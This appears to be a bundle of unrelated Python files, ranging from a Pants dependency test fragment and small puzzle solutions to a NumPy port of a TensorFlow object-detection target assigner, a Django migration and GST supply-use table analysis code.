PythonTestsStevedoreNamespaceInferenceFieldSet.create(target)
)
],
)
# This asserts that these should NOT be inferred dependencies:
# - stevedore_namespace(some.thing.else) -> {runner}_runner.thing
# - the python_distribution itself at Address(f"runners/{runner}_runner")
# It should only infer the stevedore_namespace(st2common.runners.runner) deps.
assert run_dep_inference(
Address("src/foobar", target_name="tests", relative_file_path="test_something.py"),
) == InferredDependencies(
[
Address(
f"runners/{runner}_runner/{runner}_runner",
relative_file_path=f"{runner}_runner.py",
)
for runner in st2_runners
],
)
|
import numpy as np
import random as rnd
import math
freq = 44100
ecart_fenetre = 1./441.
temps_fenetre = 0.030
def hamming_window (signal):
k =0
l =len(signal)
j =0
while (k <l/(ecart_fenetre*freq) and j<((2*l)-(ecart_fenetre*freq))):
for i in range(int(temps_fenetre*freq)):
signal[k*int(ecart_fenetre*freq)+i]*=(0.5-0.5*np.cos(2*np.pi*(i/(freq))/temps_fenetre))
j += 1
if (j == l):
break
k+=1
return signal
def hamming_window_bis (signal):
l =len(signal)
k =0
while (k <l/(ecart_fenetre*freq)):
for i in range(int(temps_fenetre*freq)):
try:
signal[k*int(ecart_fenetre*freq)+i]*=(0.5-0.5*np.cos(2*np.pi*(i/(freq))/temps_fenetre))
except IndexError:
break
k+=1
return signal
z = []
for i in range(88200):
z.append(250*i/100000)
print(hamming_window(z) == hamming_window_bis(z))
|
if __name__ == '__main__':
# case1 -> only positives
from andrew_packages.programming_problems.greedy.\
expression_maximization.__init__ import first_positives, second
print("First set:")
print(first_positives)
print("Second set:")
print(second)
from andrew_packages.util.algorithms import GenerateSubsets
subsets_second_set = GenerateSubsets(second)
subsets_second_set = list(filter(lambda sett: len(sett) == len(first_positives), subsets_second_set))
print("Subsets of second set:")
print(subsets_second_set)
maximum_sum = 0
solution = set()
for subset in subsets_second_set:
expression = 0
for element_first, element_subset in zip(list(first_positives), list(subset)):
expression += element_first * element_subset
if expression >= maximum_sum:
maximum_sum = expression
solution = subset
print(f"\nMaximum sum is: {maximum_sum} and the subset that contributed is: {solution}")
|
import re
import os
from pathlib import Path
lineRegex = re.compile(r'\s*(.*)\s*(".+")')
rubyRegex = re.compile(r'{rb}(.+?){/rb}\s*?{rt}(.+?){/rt}')
rubyRtRegex = re.compile(r'(.){rt}(.+?){/rt}')
def cleanFile(infile, outfile):
if not os.path.exists(os.path.dirname(outfile)):
os.makedirs(os.path.dirname(outfile))
out = open(outfile, "w+")
script = open(infile)
names = set()
out.write("""
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-color: #000;
color: #a1caff;
font-size: 18px;
}
</style>
</head>
<body>
""")
for line in script:
m = lineRegex.search(line)
if not m:
continue
name = m.group(1)
line = m.group(2)
# Skip some non-dialogue lines that slip through.
# No guarantee these cover every case
if name.startswith("$") or name.startswith("play"):
continue
if line.find("{rt}") > 0:
print(line)
# Replace ruby tags with html versions
line = rubyRegex.sub("<ruby>\g<1><rt>\g<2></rt></ruby>", line)
# Replace any <rt>-only lines in the same way
line = rubyRtRegex.sub("<ruby>\g<1><rt>\g<2></rt></ruby>", line)
if name is not None:
names.add(name)
out.writelines("<div>{} {}</div>"
.format(name, line))
else:
out.writelines("<div>{}</div>".format(line))
out.write("</body>")
out.write("</html>")
if __name__ == "__main__":
source_dir = "/home/hssm/New Folder/scenario/"
output_dir = "/home/hssm/mineme/"
# Last part of path is assumed to be the game name
parts = Path(source_dir).parts
start_at = len(parts) - 1
game = parts[start_at]
for root, subdirs, files in os.walk(source_dir):
subdirs = Path(root).parts[start_at:]
for file in files:
if file.endswith(".rpy"):
current_subdir = "/".join(subdirs)
outname = Path(file).stem + ".html"
outfile = os.path.join(output_dir, current_subdir, outname)
infile = os.path.join(root, file)
cleanFile(infile, outfile)
|
# 위의 그림과 같이 육각형으로 이루어진 벌집이 있다.
# 그림에서 보는 바와 같이 중앙의 방 1부터 시작해서
# 이웃하는 방에 돌아가면서 1씩 증가하는 번호를 주소로 매길 수 있다.
# 숫자 N이 주어졌을 때, 벌집의 중앙 1에서 N번 방까지
# 최수 개수의 방을 지나서 갈 때 몇 개의 방을 지나가는지
# (시작과 끝을 포함하여)를 계산하는 프로그램을 작성하시오.
N = int(input())
rng = 6
dist = 1
if N == 1:
print(1)
else:
while N-1>rng:
dist+=1
rng+=6*dist
print(dist+1)
|
from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/google/universal/google-" + filename_prep + ".csv"
trans_file = "./results/google/system-trans-text/google-" + filename_prep + "-trans.txt"
# setting initial utterance as jiwer can't handle empty strings.
# tsoft = the start of the file.
prev = "tsotf"
utt = ""
# Google specific processing.
# This function extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
with open(infile, 'r') as f:
for line in f:
if line.startswith("Finished"):
fin = re.search(r"(?<=Finished: )(.*)(?=\n)", line).group(0)
if line.startswith("Time"):
time = re.search(r"(?<=Time: )(.*)(?=\n)", line).group(0)
if line.startswith("Transcript"):
utt = re.search(r"(?<=Transcript: )(.*)(?=\n)", line).group(0)
utt = utt.replace(".", "")
if fin == "False":
process(outfile, time, prev, utt)
prev = utt
else:
process(outfile, time, prev, utt)
add_trans_chunk(trans_file, utt.lower())
prev = "tsotf"
# Universal output finalised.
clean_csv(outfile)
|
from __future__ import division
import sys
import subprocess
import glob, os
import shutil
## Author: Spencer Caplan, University of Pennsylvania
## Contact: spcaplan@sas.upenn.edu
outputFileNamesWithWordID = False
printDebugStatements = True
def accessDictEntry(dictToCheck, entryToCheck):
if entryToCheck in dictToCheck:
return dictToCheck[entryToCheck]
else:
return 0
##
## Main method block
##
if __name__=="__main__":
inputDir = "/mnt/nlpgridio2/nlp/users/spcaplan/VOT-editing/TrimmedWords/Fillers/"
outputDir = "/mnt/nlpgridio2/nlp/users/spcaplan/VOT-editing/OutputTargets-Edited/RenamedFillers/"
for file in os.listdir(inputDir):
if file.endswith(".wav"):
fileAttributes = file.split("-")
if len(fileAttributes) > 4:
globalIndex = fileAttributes[0]
localIndex = fileAttributes[1]
phone = fileAttributes[2]
trialType = fileAttributes[3]
word = fileAttributes[4]
word = word.replace('.wav','')
oldFile = os.path.join(inputDir, file)
newFileID = localIndex + '-' + trialType + '.wav'
newOutFile = os.path.join(outputDir, newFileID)
print oldFile
print newOutFile
print '\n'
shutil.copy(oldFile, newOutFile)
print 'Completed.'
quit()
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base target assigner module.
The job of a TargetAssigner is, for a given set of anchors (bounding boxes) and
groundtruth detections (bounding boxes), to assign classification and regression
targets to each anchor as well as weights to each anchor (specifying, e.g.,
which anchors should not contribute to training loss).
It assigns classification/regression targets by performing the following steps:
1) Computing pairwise similarity between anchors and groundtruth boxes using a
provided RegionSimilarity Calculator
2) Computing a matching based on the similarity matrix using a provided Matcher
3) Assigning regression targets based on the matching and a provided BoxCoder
4) Assigning classification targets based on the matching and groundtruth labels
Note that TargetAssigners only operate on detections from a single
image at a time, so any logic for applying a TargetAssigner to multiple
images must be handled externally.
"""
import tensorflow as tf
import numpy as np
from object_detection import np_box_list as box_list
from object_detection import shape_utils
KEYPOINTS_FIELD_NAME = 'keypoints'
class TargetAssigner(object):
"""Target assigner to compute classification and regression targets."""
def __init__(self, similarity_calc, matcher, box_coder, negative_class_weight=1.0, unmatched_cls_target=None):
"""Construct Object Detection Target Assigner.
Args:
similarity_calc: a RegionSimilarityCalculator
matcher: Matcher used to match groundtruth to anchors.
box_coder: BoxCoder used to encode matching groundtruth boxes with
respect to anchors.
negative_class_weight: classification weight to be associated to negative
anchors (default: 1.0). The weight must be in [0., 1.].
unmatched_cls_target: a float32 tensor with shape [d_1, d_2, ..., d_k]
which is consistent with the classification target for each
anchor (and can be empty for scalar targets). This shape must thus be
compatible with the groundtruth labels that are passed to the "assign"
function (which have shape [num_gt_boxes, d_1, d_2, ..., d_k]).
If set to None, unmatched_cls_target is set to be [0] for each anchor.
Raises:
ValueError: if similarity_calc is not a RegionSimilarityCalculator or
if matcher is not a Matcher or if box_coder is not a BoxCoder
"""
self._similarity_calc = similarity_calc
self._matcher = matcher
self._box_coder = box_coder
self._negative_class_weight = negative_class_weight
if unmatched_cls_target is None:
# self._unmatched_cls_target = tf.constant([0], tf.float32)
self._unmatched_cls_target = np.array([0], dtype=np.float32)
else:
self._unmatched_cls_target = unmatched_cls_target
@property
def box_coder(self):
return self._box_coder
def assign(self, anchors, groundtruth_boxes, groundtruth_labels=None,groundtruth_weights=None, **params):
"""Assign classification and regression targets to each anchor.
For a given set of anchors and groundtruth detections, match anchors
to groundtruth_boxes and assign classification and regression targets to
each anchor as well as weights based on the resulting match (specifying,
e.g., which anchors should not contribute to training loss).
Anchors that are not matched to anything are given a classification target
of self._unmatched_cls_target which can be specified via the constructor.
Args:
anchors: a BoxList representing N anchors
groundtruth_boxes: a BoxList representing M groundtruth boxes
groundtruth_labels: a tensor of shape [M, d_1, ... d_k]
with labels for each of the ground_truth boxes. The subshape
[d_1, ... d_k] can be empty (corresponding to scalar inputs). When set
to None, groundtruth_labels assumes a binary problem where all
ground_truth boxes get a positive label (of 1).
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box. The weights
must be in [0., 1.]. If None, all weights are set to 1.
**params: Additional keyword arguments for specific implementations of
the Matcher.
Returns:
cls_targets: a float32 tensor with shape [num_anchors, d_1, d_2 ... d_k],
where the subshape [d_1, ..., d_k] is compatible with groundtruth_labels
which has shape [num_gt_boxes, d_1, d_2, ... d_k].
cls_weights: a float32 tensor with shape [num_anchors]
reg_targets: a float32 tensor with shape [num_anchors, box_code_dimension]
reg_weights: a float32 tensor with shape [num_anchors]
match: a matcher.Match object encoding the match between anchors and
groundtruth boxes, with rows corresponding to groundtruth boxes
and columns corresponding to anchors.
Raises:
ValueError: if anchors or groundtruth_boxes are not of type
box_list.BoxList
"""
print("printing anchors in target assigner assign: {}".format(anchors.get()) )
if not isinstance(anchors, box_list.BoxList):
raise ValueError('anchors must be an BoxList')
if not isinstance(groundtruth_boxes, box_list.BoxList):
raise ValueError('groundtruth_boxes must be an BoxList')
# if groundtruth_labels is None:
# groundtruth_labels = tf.ones(tf.expand_dims(groundtruth_boxes.num_boxes(),
# 0))
# groundtruth_labels = tf.expand_dims(groundtruth_labels, -1)
# unmatched_shape_assert = shape_utils.assert_shape_equal(
# shape_utils.combined_static_and_dynamic_shape(groundtruth_labels)[1:],
# shape_utils.combined_static_and_dynamic_shape(
# self._unmatched_cls_target))
# labels_and_box_shapes_assert = shape_utils.assert_shape_equal(
# shape_utils.combined_static_and_dynamic_shape(
# groundtruth_labels)[:1],
# shape_utils.combined_static_and_dynamic_shape(
# groundtruth_boxes.get())[:1])
if groundtruth_weights is None:
num_gt_boxes = groundtruth_boxes.num_boxes()
# if not num_gt_boxes:
# num_gt_boxes = groundtruth_boxes.num_boxes()
groundtruth_weights = np.ones(num_gt_boxes, dtype=np.float32)
# with tf.control_dependencies(
# [unmatched_shape_assert, labels_and_box_shapes_assert]):
match_quality_matrix = self._similarity_calc.compare(groundtruth_boxes,anchors)
match = self._matcher.match(match_quality_matrix, **params)
reg_targets = self._create_regression_targets(anchors,groundtruth_boxes,match)
cls_targets = self._create_classification_targets(groundtruth_labels,match)
reg_weights = self._create_regression_weights(match, groundtruth_weights)
cls_weights = self._create_classification_weights(match,groundtruth_weights)
num_anchors = anchors.num_boxes()
if num_anchors is not None:
reg_targets = self._reset_target_shape(reg_targets, num_anchors)
cls_targets = self._reset_target_shape(cls_targets, num_anchors)
reg_weights = self._reset_target_shape(reg_weights, num_anchors)
cls_weights = self._reset_target_shape(cls_weights, num_anchors)
return cls_targets, cls_weights, reg_targets, reg_weights, match
def _reset_target_shape(self, target, num_anchors):
"""Sets the static shape of the target.
Args:
target: the target tensor. Its first dimension will be overwritten.
num_anchors: the number of anchors, which is used to override the target's
first dimension.
Returns:
A tensor with the shape info filled in.
"""
target_shape = target.shape
target_shape[0] = num_anchors
target = np.reshape(target, target_shape)
# target.set_shape(target_shape)
return target
def _create_regression_targets(self, anchors, groundtruth_boxes, match):
"""Returns a regression target for each anchor.
Args:
anchors: a BoxList representing M anchors
groundtruth_boxes: a BoxList representing N groundtruth_boxes
match: a matcher.Match object
Returns:
reg_targets: a float32 tensor with shape [M, box_code_dimension]
"""
print("_create_regression_targets groundtruth_boxes shape:{}".format(groundtruth_boxes.get().shape))
matched_gt_boxes = match.gather_based_on_match(groundtruth_boxes.get(),unmatched_value=np.zeros(4),ignored_value=np.zeros(4)) # expected shape: (M,4), where M=size of anchors
print("matched_gt_boxes: {}".format(matched_gt_boxes))
print("matched_gt_boxes shape:{}".format(matched_gt_boxes.shape))
print("matched_gt_boxes type:{}".format(matched_gt_boxes.dtype))
matched_gt_boxlist = box_list.BoxList(matched_gt_boxes)
print("after converting to boxlist, matched_gt_boxlist data:{}".format(matched_gt_boxlist.get()))
if groundtruth_boxes.has_field(KEYPOINTS_FIELD_NAME):
print("inside groundtruch has field logic")
groundtruth_keypoints = groundtruth_boxes.get_field(KEYPOINTS_FIELD_NAME)
matched_keypoints = match.gather_based_on_match(
groundtruth_keypoints,
unmatched_value=tf.zeros(groundtruth_keypoints.get_shape()[1:]),
ignored_value=tf.zeros(groundtruth_keypoints.get_shape()[1:]))
matched_gt_boxlist.add_field(KEYPOINTS_FIELD_NAME, matched_keypoints)
print("matched_gt_boxlist:{} , anchors={}".format(matched_gt_boxlist, anchors.get()))
matched_reg_targets = self._box_coder.encode(matched_gt_boxlist, anchors)
# match_results_shape = shape_utils.combined_static_and_dynamic_shape(
# match.match_results)
match_results_shape = match.match_results.shape
print("match_results_shape:{}".format(match_results_shape))
# Zero out the unmatched and ignored regression targets.
# unmatched_ignored_reg_targets = tf.tile(self._default_regression_target(), [match_results_shape[0], 1])
unmatched_ignored_reg_targets = np.tile(self._default_regression_target(), [match_results_shape[0], 1])
print("unmatched_ignored_reg_targets shape={}".format(unmatched_ignored_reg_targets.shape))
matched_anchors_mask = match.matched_column_indicator()
print("matched_anchors_mask shape:{}".format(matched_anchors_mask.shape))
print("matched_anchors_mask:{}".format(matched_anchors_mask))
# reg_targets = tf.where(matched_anchors_mask, matched_reg_targets, unmatched_ignored_reg_targets)
reg_targets = np.where(matched_anchors_mask, matched_reg_targets, unmatched_ignored_reg_targets)
print("reg_targets shape={}".format(reg_targets.shape))
return reg_targets
def _default_regression_target(self):
"""Returns the default target for anchors to regress to.
Default regression targets are set to zero (though in
this implementation what these targets are set to should
not matter as the regression weight of any box set to
regress to the default target is zero).
Returns:
default_target: a float32 tensor with shape [1, box_code_dimension]
"""
# return tf.constant([self._box_coder.code_size*[0]], tf.float32)
return np.array([self._box_coder.code_size*[0]], dtype=np.float32)
def _create_classification_targets(self, groundtruth_labels, match):
"""Create classification targets for each anchor.
Assign a classification target of for each anchor to the matching
groundtruth label that is provided by match. Anchors that are not matched
to anything are given the target self._unmatched_cls_target
Args:
groundtruth_labels: a tensor of shape [num_gt_boxes, d_1, ... d_k]
with labels for each of the ground_truth boxes. The subshape
[d_1, ... d_k] can be empty (corresponding to scalar labels).
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
Returns:
a float32 tensor with shape [num_anchors, d_1, d_2 ... d_k], where the
subshape [d_1, ..., d_k] is compatible with groundtruth_labels which has
shape [num_gt_boxes, d_1, d_2, ... d_k].
"""
print("inside _create_classification_targets ")
print("groundtruth_labels:{}".format(groundtruth_labels))
# wrapped_groundtruth_labels = np.expand_dims(groundtruth_labels, axis=1)
# print("wrapped_groundtruth_labels shape:{}".format(wrapped_groundtruth_labels.shape))
print("unmatched_cls_target shape:{}".format(self._unmatched_cls_target.shape))
return match.gather_based_on_match(groundtruth_labels,unmatched_value=self._unmatched_cls_target,ignored_value=self._unmatched_cls_target)
def _create_regression_weights(self, match, groundtruth_weights):
"""Set regression weight for each anchor.
Only positive anchors are set to contribute to the regression loss, so this
method returns a weight of 1 for every positive anchor and 0 for every
negative anchor.
Args:
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box.
Returns:
a float32 tensor with shape [num_anchors] representing regression weights.
"""
return match.gather_based_on_match(
groundtruth_weights, ignored_value=0., unmatched_value=0.)
def _create_classification_weights(self,
match,
groundtruth_weights):
"""Create classification weights for each anchor.
Positive (matched) anchors are associated with a weight of
positive_class_weight and negative (unmatched) anchors are associated with
a weight of negative_class_weight. When anchors are ignored, weights are set
to zero. By default, both positive/negative weights are set to 1.0,
but they can be adjusted to handle class imbalance (which is almost always
the case in object detection).
Args:
match: a matcher.Match object that provides a matching between anchors
and groundtruth boxes.
groundtruth_weights: a float tensor of shape [M] indicating the weight to
assign to all anchors match to a particular groundtruth box.
Returns:
a float32 tensor with shape [num_anchors] representing classification
weights.
"""
return match.gather_based_on_match(
groundtruth_weights,
ignored_value=0.,
unmatched_value=self._negative_class_weight)
def get_box_coder(self):
"""Get BoxCoder of this TargetAssigner.
Returns:
BoxCoder object.
"""
return self._box_coder
|
import asyncio
import aiohttp
import time
ev = asyncio.get_event_loop()
async def make_request():
async with aiohttp.ClientSession() as session:
async with session.get('http://localhost:8000/') as resp:
print(time.strftime("%H:%M:%S"), await resp.text())
async def request_producer():
while True:
ev.create_task(make_request())
await asyncio.sleep(1.0)
ev.create_task(request_producer())
ev.run_forever()
|
from .cyclic_lr import CyclicLR
from .learningratefinder import LearningRateFinder
|
class Solution:
def canIWin(self, maxChoosableInteger: int, desiredTotal: int) -> bool:
if maxChoosableInteger >= desiredTotal: return True
if (1 + maxChoosableInteger) * maxChoosableInteger / 2 < desiredTotal: return False
def dfs(state, desiredTotal, dp):
if dp[state] != None:
return dp[state]
for i in range(1, maxChoosableInteger + 1):
cur = 1 << (i - 1)
if cur & state != 0:
continue
if i >= desiredTotal or not dfs(cur | state, desiredTotal - i, dp):
dp[state] = True
return True
dp[state] = False
return False
return dfs(0, desiredTotal, [None] * (1 << maxChoosableInteger))
|
# Generated by Django 2.0.2 on 2018-03-19 08:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ClassesDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='EcosystemsDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('description', models.TextField(max_length=500, null=True)),
],
),
migrations.CreateModel(
name='ParametersDescription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('mandatory', models.BooleanField()),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(max_length=300)),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='partnerdb.Company')),
],
),
migrations.CreateModel(
name='ProductClasses',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.ClassesDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='classes', to='partnerdb.Product')),
],
),
migrations.CreateModel(
name='ProductEcosystems',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.EcosystemsDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ecosystems', to='partnerdb.Product')),
],
),
migrations.CreateModel(
name='ProductLogs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True)),
('logrecords', models.TextField(max_length=500)),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='logs', to='partnerdb.Product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ProductParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.TextField(max_length=500)),
('description', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.ParametersDescription')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='partnerdb.Product')),
],
),
migrations.AddField(
model_name='classesdescription',
name='ecosystem',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='partnerdb.EcosystemsDescription'),
),
]
|
import turtle, random, math
def main():
limit = 1
scale = 150
iterations = 5000
sidelength = scale * 2
count = 0
radius = limit * scale
# print(area)
turtle.tracer(0)
turtle.setworldcoordinates(-(scale), -(scale), (scale), (scale))
turtle.hideturtle()
turtle.penup()
turtle.goto(0, -(scale))
turtle.pendown()
turtle.circle(radius)
turtle.penup()
turtle.goto(-(scale), -(scale))
turtle.pendown()
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
turtle.forward(sidelength)
turtle.left(90)
bullseye = 0
while(count <= (iterations)):
turtle.penup()
turtle.goto((random.randint(-(scale), (scale))), (random.randint(-(scale), (scale))))
turtle.pendown()
# turtle.position()
# print(turtle.position())
if math.sqrt(turtle.xcor()**2 + turtle.ycor()**2) <= radius:
turtle.dot(5,"green")
bullseye += 1
else:
turtle.dot(5,"red")
count += 1
turtle.update()
pi = 4 * bullseye/iterations
print(pi)
if __name__ == "__main__":
main()
|
import string
import pandas as pd
import numpy as np
from babel.numbers import format_currency
# Function to convert currency into Rupee format
def in_rupees(curr):
curr_str = format_currency(curr, 'INR', locale='en_IN').replace(u'\xa0', u' ')
return(remove_decimal(curr_str))
def remove_decimal(S):
S = str(S)
S = S[:-3]
return S
def col2num(col):
num = 0
for c in col:
if c in string.ascii_letters:
num = num * 26 + (ord(c.upper()) - ord('A')) + 1
return num
# Function to reshape an array to a single colums matrix
def re_shape(input_vec):
output_vec = input_vec.reshape(input_vec.shape[0], 1)
return output_vec
# Function to extract data from the Supply Use Table excel file
def import_Excel_SUT(filename, sheet_name_sup, sheet_name_use, sheet_name_rates,
sheet_name_exempt, sheet_name_reg_ratio):
# First prepare the Excel file by Selecting the entire sheet and unmerging any merged cells
'''
SUPPLY table
'''
df_supply = pd.read_excel(filename, sheet_name_sup, index_col=False,
header=None)
df_supply.fillna(0, inplace=True)
supply_mat_start_col_excel="C"
supply_mat_end_col_excel = "BP"
supply_mat_start_col = col2num(supply_mat_start_col_excel)
supply_mat_end_col=col2num(supply_mat_end_col_excel)
supply_mat_start_row=4
supply_mat_end_row=143
supply_mat = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,
supply_mat_start_col-1:supply_mat_end_col]
supply_mat = supply_mat.values
supply_col_product_id_excel = "B"
supply_col_product_id = col2num(supply_col_product_id_excel)
supply_row_industry_id = 2
# Import Vector
import_col_excel = "BX"
import_col = col2num(import_col_excel)
import_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,import_col-1]
import_vec = import_vec.values
# Trade & Transport Margin Vector
trade_margin_col_excel = "BZ"
trade_margin_col = col2num(trade_margin_col_excel)
trade_margin_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,trade_margin_col-1]
trade_margin_vec = trade_margin_vec.values
# Product tax less subsidies Vector
tax_subsidies_col_excel = "BR"
tax_subsidies_col = col2num(tax_subsidies_col_excel)
tax_subsidies_vec = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row,tax_subsidies_col-1]
tax_subsidies_vec = tax_subsidies_vec.values
product_header = df_supply.iloc[supply_mat_start_row-1:supply_mat_end_row, supply_col_product_id-2:supply_col_product_id]
product_header = product_header.values
industry_header = df_supply.iloc[supply_row_industry_id-1, supply_mat_start_col-1:supply_mat_end_col]
industry_header = industry_header.values
# Product Header Dataframe to ensure rates are correctly matched
df_product = pd.DataFrame(data = product_header, columns = np.array(['srl_no', 'product_id']))
df_product['srl_no'] = df_product['srl_no'].astype(str)
'''
USE table
'''
df_use = pd.read_excel(filename, sheet_name_use, index_col=False,
header=None)
df_use.fillna(0, inplace=True)
use_mat_start_col_excel="C"
use_mat_end_col_excel="BP"
use_mat_start_col=col2num(use_mat_start_col_excel)
use_mat_end_col=col2num(use_mat_end_col_excel)
use_mat_start_row=4
use_mat_end_row=143
use_mat = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
use_mat_start_col-1:use_mat_end_col]
use_mat = use_mat.values
# Public final consumption Vector
fin_cons_hh_col_excel = "BR"
fin_cons_hh_col = col2num(fin_cons_hh_col_excel)
fin_cons_hh_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
fin_cons_hh_col-1]
fin_cons_hh_vec = fin_cons_hh_vec.values
# Govt. final consumption Vector
fin_cons_gov_col_excel = "BS"
fin_cons_gov_col = col2num(fin_cons_gov_col_excel)
fin_cons_gov_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,
fin_cons_gov_col-1]
fin_cons_gov_vec = fin_cons_gov_vec.values
# Gross capital formation Vector
gfcf_col_excel ="BT"
gfcf_col = col2num(gfcf_col_excel)
gfcf_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,gfcf_col-1]
gfcf_vec = gfcf_vec.values
# Valuables Vector
vlbl_col_excel ="BU"
vlbl_col = col2num(vlbl_col_excel)
vlbl_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,vlbl_col-1]
vlbl_vec = vlbl_vec.values
# Change in stocks Vector
cis_col_excel ="BV"
cis_col = col2num(cis_col_excel)
cis_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,cis_col-1]
cis_vec = cis_vec.values
# Export Vector
export_col_excel = "BW"
export_col = col2num(export_col_excel)
export_vec = df_use.iloc[use_mat_start_row-1:use_mat_end_row,export_col-1]
export_vec = export_vec.values
'''
GST Rates table
'''
df_rates = pd.read_excel(filename, sheet_name_rates, index_col=False,
header=0)
df_rates.fillna(0, inplace=True)
df_rates['weighted_rates'] = df_rates['rates'] * df_rates['weight']
df_rates = df_rates.groupby(['srl_no'])["weighted_rates"].sum()
df_rates = df_rates.reset_index()
df_rates = df_rates.values
df_rates = pd.DataFrame(data = df_rates, columns = np.array(['srl_no', 'rates']))
df_rates['srl_no'] = df_rates['srl_no'].astype(int)
df_rates['srl_no'] = df_rates['srl_no'].astype(str)
df_rates = pd.merge(df_rates, df_product,
how="inner", on="srl_no")
df_rates = df_rates[['product_id', 'rates']]
rate_vec = df_rates['rates'].values
'''
Exempt Supply vector
'''
df_exempt = pd.read_excel(filename, sheet_name_exempt, index_col=False,
header=0)
df_exempt.fillna(0, inplace=True)
df_exempt = df_exempt[['product_id', 'exempt']]
# merge with product id to ensure that the rates are correctly matched
df_exempt = pd.merge(df_product, df_exempt,
how="inner", on="product_id")
exempt_vec = df_exempt['exempt'].values
'''
GST Registered Ratio by Industry
'''
df_gst_reg_ratio = pd.read_excel(filename, sheet_name_reg_ratio, index_col=False)
industry_group_header = df_gst_reg_ratio['industry_group'].values
gst_reg_ratio_ind_vec = df_gst_reg_ratio['gst_reg_ratio'].values
return (supply_mat, tax_subsidies_vec, import_vec, trade_margin_vec,
industry_header, df_product, use_mat, fin_cons_hh_vec,
fin_cons_gov_vec, gfcf_vec, vlbl_vec, cis_vec, export_vec,
gst_reg_ratio_ind_vec, industry_group_header, rate_vec, exempt_vec)
# Function to blow up the values with a blow_up factor
def blow_up_mat(supply_mat, use_mat, import_vec, trade_margin_vec, tax_subsidies_vec,
export_vec, fin_cons_hh_vec, fin_cons_gov_vec, gfcf_vec, vlbl_vec,
cis_vec, blow_up_factor):
supply_mat *= blow_up_factor
use_mat *= blow_up_factor
import_vec *= blow_up_factor
trade_margin_vec *= blow_up_factor
tax_subsidies_vec *= blow_up_factor
export_vec *= blow_up_factor
fin_cons_hh_vec *= blow_up_factor
fin_cons_gov_vec *= blow_up_factor
gfcf_vec *= blow_up_factor
vlbl_vec *= blow_up_factor
cis_vec *= blow_up_factor
return (supply_mat, use_mat, import_vec, trade_margin_vec,
tax_subsidies_vec, export_vec, fin_cons_hh_vec,
fin_cons_gov_vec, gfcf_vec, vlbl_vec, cis_vec)
# Function to adjust supplies to taxpayers only to those who are registered
def adjusted_SUT(gst_reg_ratio_ind_vec, input_mat):
adj_input_mat = gst_reg_ratio_ind_vec*input_mat
return adj_input_mat
# Function to compute the output tax
def calc_output_tax(supply_mat, rate_vec):
output_tax_mat = supply_mat * rate_vec
return output_tax_mat
